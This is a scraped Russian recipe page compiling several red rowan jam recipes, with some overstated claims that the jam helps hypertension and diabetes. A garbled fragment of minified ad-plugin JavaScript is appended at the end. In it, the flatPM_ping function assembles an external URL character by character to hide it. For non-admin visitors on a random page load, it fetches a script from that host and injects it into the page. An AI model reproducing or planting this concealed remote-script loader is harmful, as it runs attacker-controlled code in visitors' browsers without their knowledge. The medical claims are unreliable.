Варенье из красной рябины

Варенье из красной рябины – простой рецепт

Любуясь, порой, красотой ярко-красных налитых гроздьев рябины, многие даже и не догадываются о том, что из них можно сварить не только божественно вкусное, но и очень ценное и лечебное варенье. Рекомендуем простые рецепты приготовления такого лакомства из рябины в чистом виде, а также в сочетании ее с яблоками, апельсином и орехами.

Как сварить варенье из красной рябины в домашних условиях – простой рецепт

Перед приготовлением варенья рябину необходимо предварительно поснимать с плодоножек, промыть и залить водой на двадцать четыре часа. В течение этого времени каждые шесть часов меняем воду на чистую.

Далее из очищенной водички и сахарного песка в указанной рецептурой пропорции варим сахарный сироп, смешав компоненты в кастрюле и подогрев их при частом помешивании до кипения и растворения всех сладких кристаллов.

Рябину сливаем на сито, даем стечь и перекладываем в кипящий сироп. После повторного закипания содержимого кастрюли снимаем ее с плиты и оставляем остывать при комнатных условиях. Теперь вылавливаем рябиновые ягоды в другую посудину, снова ставим сироп закипать на умеренный огонь и кипятим минут двадцать без ягод. После этого в бурлящую сладкую массу перекладываем рябину и варим варенье еще двадцать пять минут. Расфасовываем лакомство по заблаговременно подготовленным стерильным емкостям, укупориваем проваренными крышечками и переворачиваем под «шубу» для медленного остывания и самостерилизации.

Варенье из красной рябины – простой рецепт с яблоками

  • рябина красная – 995 г;
  • яблоки – 995 г;
  • вода очищенная – 420 мл;
  • сахар – 1,9 кг.

Если есть время, то рябину как и в предыдущем случае лучше предварительно вымочить в течение суток, периодически меняя водичку. А чтобы ускорить процесс можно просто рябиновые плоды отварить в чуть подсоленной водичке в течение двух-трех минут, после чего откинуть на сито и промыть чистой водой.

Пока жидкость с рябины стекает, готовим яблоки. Избавляем плоды от сердцевин с семечками и плодоножек, после чего нарезаем мякоть кубиками. Кожуру можно также очистить или оставить по желанию.

Из воды и сахарного песка варим сироп с учетом рекомендаций описанных в рецепте выше, после чего опускаем в него кубики яблочек и подготовленную рябину. После повторного закипания варим варенье в течение сорока пяти минут, поддерживая все это время едва заметное кипение.

Готовое рябиново-яблочное лакомство раскладываем по подготовленным заблаговременно сухим и стерильным стеклянным сосудам, укупориваем проваренными в течение пяти минут крышками и переворачиваем их дном кверху под «шубу» для самостерилизации и медленного остывания.

Очень вкусное варенье «По-царски» из красной рябины с апельсином – рецепт

  • рябина красная – 995 г;
  • апельсин – 395 г;
  • вода очищенная – 220 мл;
  • орехи грецкие – 1 горсть;
  • сахар – 1,2 кг.

В данном случае рябину мы дополним апельсином и орехами. Получится просто по-царски вкусно и невероятно ароматно.

Для реализации рецепта рябину обираем с гроздьев, промываем тщательным образом, обсушиваем и отправляем на несколько часов в морозильную камеру. Это еще один способ избавиться от горечи, присущей красным ягодкам.

Замороженную рябину помещаем в кастрюльку, заливаем стаканом водички и ставим на плиту. После закипания сливаем воду, ягоды перекладываем в другую миску, а из отвара и сахарного песка готовим сахарный сироп, доведя смесь до кипения и дождавшись растворения кристаллов при помешивании.

Теперь опускаем в сироп рябину, очищенные и разрезанные на несколько частей апельсиновые дольки, варим лакомство в течение сорока минут, после чего добавляем измельченные орехи и выдерживаем на плите еще минут десять. Храним такое царское варенье также, как и любое другое – в стерильных, герметично укупоренных баночках.

Варенье из красной рябины – 8 самых простых и вкусных рецептов

Добрый день, дорогие читатели! Сегодня попробую вас уговорить приготовить вкусное варенье из красной рябины. Такой десерт мало кто готовит, а в магазине его вообще не найти.

Но, это очень ароматное, полезное и вкусное лакомство. Если хотите удивить гостей своими кулинарными способностями, тогда давайте готовить!

Как подготовить ягоды и важные рекомендации

1. Ягоды для такого десерта надо собирать после заморозков, тогда она перестает горчить. Если вы собрали плоды до наступления морозов, то это легко можно исправить. Снимите ягоды с кисточек, хорошо промойте, уберите в морозильную камеру на 3дня.

Причем после заморозки ягодки становятся более сочными. Можно замочить ягоды в холодной воде на 12 часов, иногда меняя воду или пробланшировать в соленой воде (на литр воды достаточно всего чайной ложки поваренной соли).

2. Из-за своего специфического вкуса она плохо сочетается с другими фруктами и ягодами. Исключение составляют – яблоки, орехи, апельсины и тыква.

Читать еще:  Сыр из кефира

Варенье из красной рябины: полезные свойства

О пользе самой ягоды вы очень подробно можете прочитать ЗДЕСЬ . А что касается самого десерта, то всем известно, что после тепловой обработки часть витаминов и минералов, конечно, уменьшается.

Но, чтобы поддержать эластичность сосудов и наполнить организм в зимний период, а также ранней весной всеми необходимыми элементами, достаточно съедать всего 1-2 чайные ложечки этого лакомства.

Варенье в достаточном количестве содержит – Витамины А и С, а также натрий, калий, магний.

Его рекомендуется употреблять при – гипертонии, малокровии, при авитаминозе, сахарном диабете, при различных заболеваниях сосудов, как мочегонное средство.

Как приготовить варенье из красной рябины

Это самый простой рецепт, который по праву можно назвать – классическим.

  • 1 кг. – подмороженной красной рябины
  • 0,5 кг – песок сахарный
  • 1,5 стакана – воды

1. Подмороженные ягоды хорошо промойте, можно для надежности еще пробланшировать в соленой воде буквально 1-2 минуты, чтобы не испортить горьким вкусом наш десерт.

2. Теперь варим сироп. В большую кастрюлю (тазик) влейте воду, добавьте сахарный песок, варите на минимальном нагреве до закипания, все время помешивайте. Когда сахар полностью растворится, поварите еще 5 минут.

3. Далее переложите все ягоды в сладкий сироп, варите после закипания 15-20 минут. Выключайте плиту и дайте десерту полностью остыть.

4. Затем во второй раз проварите лакомство 20-30 минут. Можно отварить еще и третий раз, но обычно хватает двух. Пробуйте ягодку на свой вкус!

5. Далее разложите по чистым, сухим стеклянным банкам (банки можно не стерилизовать, а просто ошпарить кипятком), закрыть капроновой крышкой. Вот и все, наше варенье готово!

Калорийность на 100 гр. – 257 ккал

Видео рецепт: Варенье из красной рябины

По-царски с апельсином и грецкими орехами

Варенье из красной рябины по-царски

Это самый популярный рецепт! Сочетание рябины с апельсином и грецкими орехами дает незабываемый вкус, и добавляет пользы этому десерту.

  • 1 кг. – красной подмороженной рябины
  • 2 кг. – песка сахарного
  • 3-4 шт. – апельсин
  • 50 гр. – ядер грецких орехов
  • 1,5 литра – воды

1. Подготовьте плоды для варки, как написано выше.

2. Варим сахарный сироп, затем в кастрюлю с горячим сиропом опускаем наши ягоды, варим после закипания еще 15 минут.

3. Пока варятся ягоды, почистите апельсины, разделите на дольки, нарежьте небольшими кусочками.

4. Грецкие орехи измельчите ножом, но не очень мелко.

5. В кастрюлю с ягодами добавьте апельсиновые кусочки, проварите 20-25 минут, добавьте орехи, проварите еще 20 минут.

6. Осталось разлить по банкам и отправить на хранение.

С кусочками тыквы

Варенье из красной рябины с кусочками тыквы

С таким десертом вы получаете двойную порцию каротина, а лимонка делает вкус десерта более насыщенный.

  • 1 кг. – подмороженных ягод
  • 0,6 кг. – мякоти тыквы
  • 1 ч. ложечка – лимонной кислоты (можно заменить цедрой одного лимона)
  • 2 кг. – песка сахарного
  • 1,5 литра – воды

1. Подготовьте плоды для варки.

2. Сварите сироп из воды и сахара, добавьте ягоды, доведите до кипения, оставьте кастрюлю с десертом на плите остывать на 3-4 часа.

3. Мякоть сладкой тыквы нарежьте небольшими кубиками, добавьте их в варенье, плюс лимонную кислоту или цедру лимона.

4. Варите десерт около 40 минут или до готовности.

5. Лакомство поделите по стеклянным баночкам и спрячьте до прихода гостей!

На заметку хозяйке! В этот рецепт вы можете еще добавить по вкусу – корицу , ваниль, имбирь .

Калорийность на 100 гр. – 160 ккал

С яблоками

Рецепт варенья из красной рябины с яблоками

Для такого рецепта лучше брать кислые и твердые яблоки, например, «Антоновку», количество фруктов возьмите на свой вкус.

Молотая корица всегда идеально сочеталась с любыми яблоками, так что и в этом рецепте она будет к месту.

  • 1 кг. – ягод рябины
  • 2 кг. – песка сахарного
  • 5-6 шт. – больших яблок
  • 1,5 литра – воды
  • 2 ст. ложки – молотой корицы

1. Рябину подготовьте для варенья, как написано выше.

2. Теперь сварите сладкий сироп, добавьте ягодки, проварите на минимальном огне около 15-20 минут, после появления первых пузырьков.

3. Яблоки хорошо промойте, разрежьте на небольшие кубики или тонкие дольки (шкурку можно не срезать).

4. Подготовленные кусочки добавьте в наше лакомство, варите еще 30 минут, добавьте корицу, перемешайте и варите еще 10-15 минут.

5. Разлейте наш десерт по стерильным банкам и укупорьте.

Хозяйке на заметку! В этом рецепте можно яблоки заменить твердыми грушами или приготовить ассорти.

Калорийность на 100 гр. – 212 ккал

Видео рецепт: Варенье из красной рябины с яблоками и грецкими орехами

“Сырое” через мясорубку

Рецепт варенья из красной рябины без варки через мясорубку

Чтобы сохранить все витамины в ягодках, можно приготовить такое «сырое» варенье. В этом рецепте сахар можно заменить натуральным медом.

  • 1 кг. – красной рябины
  • 2 кг. – песка сахарного

1. Пробланшируйте плоды 2 минуты в подсоленной воде, измельчите в блендере или через мясорубку.

2. В полученную ягодную массу добавьте сахар или мед, все перемешайте, оставьте на один час прямо на кухне. Рябина должна хорошо пустить сок.

3. Теперь можно полезный десерт разложить по сухим банкам и поставить в холодильник.

Варенье из красной рябины

Вкусное, полезное, витаминное лакомство на зиму! Существует большое количество интересных рецептов приготовления варенья из красной рябины на зиму. Его делают из красной рябины с яблоками, с апельсинами, с медом и грецкими орехами и другими добавками. Рассмотрим один из самых простых рецептов.

  1. Главная
  2. Лучшие рецепты
  3. Категории рецепта
  4. Варенье из красной рябины

Ингредиенты и как готовить

ингредиенты на 15 порций или – количество продуктов для нужных вам порций будет подсчитано автоматически!’>

Всего:

Вес состава: 100 гр
Калорийность
состава:
176 ккал
Белков: 1 гр
Жиров: 0 гр
Углеводов: 45 гр
Б/Ж/У: 2 / 0 / 98
Н 11 / С 0 / В 89

Время приготовления: 8 ч

Пошаговое приготовление

Шаг 1:

Рябину, как правило, собирают в августе-сентябре. Она растет и в саду, и в лесу, лесная ягода, конечно, более экологически чистая и полезная. Рябина имеет своеобразную горчинку, которая многих хозяек пугает относительно использования ее в пищу. Но на самом деле, от горечи в ягодах легко избавиться, заморозив рябину в морозильной камере, или дождаться заморозков и собрать ягоды после них.

Шаг 2:

Приготовим ингредиенты для варенья.

Шаг 3:

Ягоды рябины отделяем от веточек, тщательно промываем под проточной водой, откинув на дуршлаг, даем просохнуть. После этого ягоды можно положить в морозильную камеру на несколько часов, чтобы удалить горчинку из рябины. Если нравится вкус свежей рябины, можно ее не замораживать.

Шаг 4:

В кастрюлю для варки варенья наливаем чистую воду, добавляем сахар и ставим на огонь. Варим сироп, помешивая ложкой на среднем огне до полного растворения сахара. Затем в сироп спускаем ягоды рябины. Даем заготовке варенья закипеть и сразу выключаем огонь. Кастрюлю накрываем крышкой и оставляем при комнатной температуре на 6 часов.

Шаг 5:

Через указанное время варенья снова ставим на огонь, после закипания смеси убавляем огонь до минимального и варим варенье около 20 минут, снимая образующуюся на поверхности пену.

Шаг 6:

Горячее варенье раскладываем по стерильным баночкам и закрываем их крышками. Даем варенью остыть под пледом при комнатной температуре и убираем на хранение в прохладное место.

Шаг 7:

В зимние дни баночка такого вкусного ароматного варенья отлично дополнит чаепитие в кругу семьи или выступит отличной начинкой для пирогов. Приятного аппетита!

Рябина очень полезная ягода, богатая витаминами группы А и С, калием, магнием и иными микроэлементами. Она способствует укреплению иммунитета и является хорошей профилактикой авитаминоза, нормализует давление, работу сердечно-сосудистой системы, полезна при заболеваниях печени и желудка. Поэтому несколько баночек витаминной заготовки из красной рябины на зиму следует сделать.

Варенье из рябины красной – рецепт простой и полезный

Припасливые хозяйки всегда готовят на зиму варенье из рябины красной, рецепт которого легкий и быстрый. Лакомство можно приготовить с грецкими орехами, апельсином, также протереть с сахаром или добавить яблоки. Вариаций множество, главное не отклоняться от количественного состава и соблюдать технологию…

Простой рецепт приготовления варенья из красной рябины

Не многие знают, что из красной рябины, яркими гроздьями которой нам так нравится любоваться в конце лета и осенью, можно сварить невероятно вкусное, к тому же очень полезное для организма лакомство. Варенье из рябины красной – рецепт простой в приготовлении, можно готовить как в чистом виде, так и добавлять в него различные вкусовые добавки – яблоки, цитрусовые и т.д.

Классическое рябиновое варенье легко сварить в домашних условиях. Нам понадобятся следующие компоненты:

  • Плоды красной рябины – 1 кг
  • Песок – 1,5 кг
  • Чистая вода – 650 мл

Ягодки перед варкой обязательно перебрать, отделить все плодоножки, хорошо вымыть и залить на сутки водой. Важно каждые 6 часов воду менять.

В подготовленные 650 мл воды высыпать сахар и поставить на огонь. Растворившись, сахар превратится в сироп однородной консистенции. Доводим сироп до максимальной температуры, ждем, пока весь песок растворится. Подсушенные ягоды высыпаем в кипящую сладкую воду и кипятим содержимое кастрюли еще раз, после чего убираем огонь и даем остыть.

После полного остывания содержимое кастрюли процеживаем, ягоды перекладываем в отдельную емкость, а сироп вновь доводим до кипения и поддерживаем это состояние 25 минут. В кипящий сироп высыпаем рябиновые ягоды и варим лакомство еще полчаса.

Готовое варенье разливаем по стерильным банкам, закатываем железными или герметичными пластиковыми крышками и укутываем до полного остывания. Целебное варенье! Кроме того, попробуйте приготовить варенье из инжира, которое также полезное, и также очень вкусное.

Красная рябина с яблоками

Если хотите, чтобы вкус этой зимней сладости получился более нежным, – добавьте в рецептуру яблоки. Варенье из красной рябины и яблок получается не менее вкусным и целебным. Для приготовления берем:

  • 1 кг рябиновых ягод
  • 1 кг яблок
  • 450 мл чистой воды
  • 2 кг песка
  1. Плоды отделить от кистей, перебрать, промыть и замочить на 24 часа, меняя воду несколько раз за сутки (опытные хозяйки для ускорения процесса вымачивания рекомендуют проварить рябинку в слабосоленой воде несколько минут, после чего промыть под проточной водой)
  2. Яблоки любого сорта (Мельба, Медуница) очистить от сердцевины и кожуры, нарезать небольшими кубиками
  3. Сироп сварить по технологии, описанной в классическом рецепте приготовления (см. выше)
  4. Опустить в горячий сироп яблоки и ягоды, варить после закипания 45 минут на медленном огне (не забывайте помешивать!)
  5. Банки и крышки простерилизовать, дать высохнуть, после чего разложить в них готовое варенье. Перевернуть банки вверх дном и укутать теплым до полного остывания

Это невероятно вкусное рябиновое лакомство с яблочной ноткой никого не сможет оставить равнодушным!

Добавляем апельсин

Надумали заготовить варенье из рябины красной – рецепт простой и в то же время оригинальный получится, если добавить к этой горьковатой ягоде апельсин. Нам потребуется:

  • 1 кг спелых ягод
  • 2 крупных апельсина
  • 250 мл чистой воды
  • Горсть молотых грецких орехов
  • 1,2 кг сахарного песка

Замороженные плоды кладем в емкость, в которой будет вариться консервация, выливаем воду и ставим на огонь. Когда вода закипит, ее необходимо слить, а ягодки переложить в иную посуду. Слитый отвар перемешиваем с сахаром до образования сиропа, кипятим его и после полного растворения песчинок возвращаем в варево ягодки.

Апельсины очистить, разделить на дольки, каждую дольку порезать на несколько кусочков. Положить порезанные апельсины в сироп вместе с ягодами и варить 40 минут. Спустя указанное время добавляем в кастрюлю орехи и даем прокипеть еще 10 минут.

Как и в остальных рецептах, готовое лакомство разложить по стерильным банкам, герметично закрыть крышками, и дать остыть, хорошо укутав одеялом. А если вам нравятся сладкие фрукты и ягоды, попробуйте также заготовить варенье из хурмы, вкус которого вы обязательно оцените!

Варим красную рябину с тыквой

Многие хозяйки недооценивают полезные свойства такого овоща, как тыква. Между тем, это очень вкусный и богатый питательными веществами овощ, из которого готовят огромное число блюд, и даже сладости! Ароматным и пикантным на вкус получается варенье из рябины и тыквы. Для его приготовления возьмем необходимые составляющие:

  • 1 кг тыквы
  • 1⁄2 кг сахара
  • 1⁄2 кг рябиновых ягод
  • Цедра лимона
  • Ванильный сахар по вкусу

Ягоды хорошо перебрать, промыть и дать обсохнуть в дуршлаге или на полотенце. Чтобы ягода утратила свою горечь, на сутки кладем ее в морозильную камеру. Тыкву необходимо очистить от кожуры, помыть и нашинковать небольшими кубиками. Положить мякоть в емкость, где она будет вариться, и засыпать ее сахарным песком (взять 2/3 от приготовленного). Так тыква должна простоять не менее 5 часов и дать сок. Если сока получилось мало, можно добавить несколько столовых ложек чистой воды.

Емкость с тыквенной мякотью в сахаре ставим на огонь и варим, пока тыква не станет мягкой, после чего добавляем к ней ягоды и оставшийся сахар (при необходимости можно добавить еще воды). Варим на небольшом огне, пока ягодки не размягчатся, не забывая мешать.

Когда плоды стали мягкими, добавляем в заготовку лимоновую цедру и ванильный сахар. Варим еще несколько минут и снимаем с огня. Закатываем тыквенно-рябиновое варенье в стерильные банки и убираем «под шубу».

Надо сказать, что многие хозяйки вареным ягодам предпочитают такую заготовку, как рябина, протертая с сахаром. В таком виде красная рябина сохраняет намного больше витаминов, которые так необходимы человеку зимой и весной.

Как видите, любое варенье из рябины красной – рецепт простой и быстрый, однако вкус у каждой рецептуры получается свой. Не бойтесь экспериментировать, и приятного аппетита!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};